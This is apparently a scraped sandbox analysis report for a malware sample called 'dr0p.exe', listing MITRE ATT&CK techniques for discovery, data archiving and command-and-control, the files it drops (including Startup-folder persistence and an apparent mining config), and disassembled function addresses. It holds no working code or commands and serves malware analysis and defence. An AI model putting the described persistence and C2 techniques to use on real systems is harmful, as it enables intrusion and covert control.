Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report dr0p.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrome.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe

C:\Users\user\Desktop\hm.exe

C:\Users\user\Desktop\poolworker.config.ini

C:\Users\user\Desktop\q.exe

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

HTTP Request Dependency Graph

HTTP Packets

Windows Analysis Report
dr0p.exe

Function 0042006A Relevance: 38.6, APIs: 14, Strings: 8, Instructions: 99
filenetworkstringCOMMON

Function 00420000 Relevance: 36.9, APIs: 13, Strings: 8, Instructions: 123
stringnetworklibraryCOMMON

Function 00007FF741EC0754 Relevance: 45.9, APIs: 21, Strings: 5, Instructions: 380
filesleeptimeCOMMON

Function 00007FF741EAA4AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250
COMMON

Function 00007FF741EB8624 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 101
memorywindowCOMMON

Function 00007FF741EA40BC Relevance: 10.7, APIs: 7, Instructions: 153
fileCOMMON

Function 00007FF741E95E24 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 586
COMMON

Function 00007FF741EADFD0 Relevance: 143.9, APIs: 16, Strings: 66, Instructions: 440
libraryfileloaderCOMMON

Function 00007FF741EC1900 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 195
libraryCOMMONLIBRARYCODE

Function 00007FF741EBF4E0 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 285
COMMON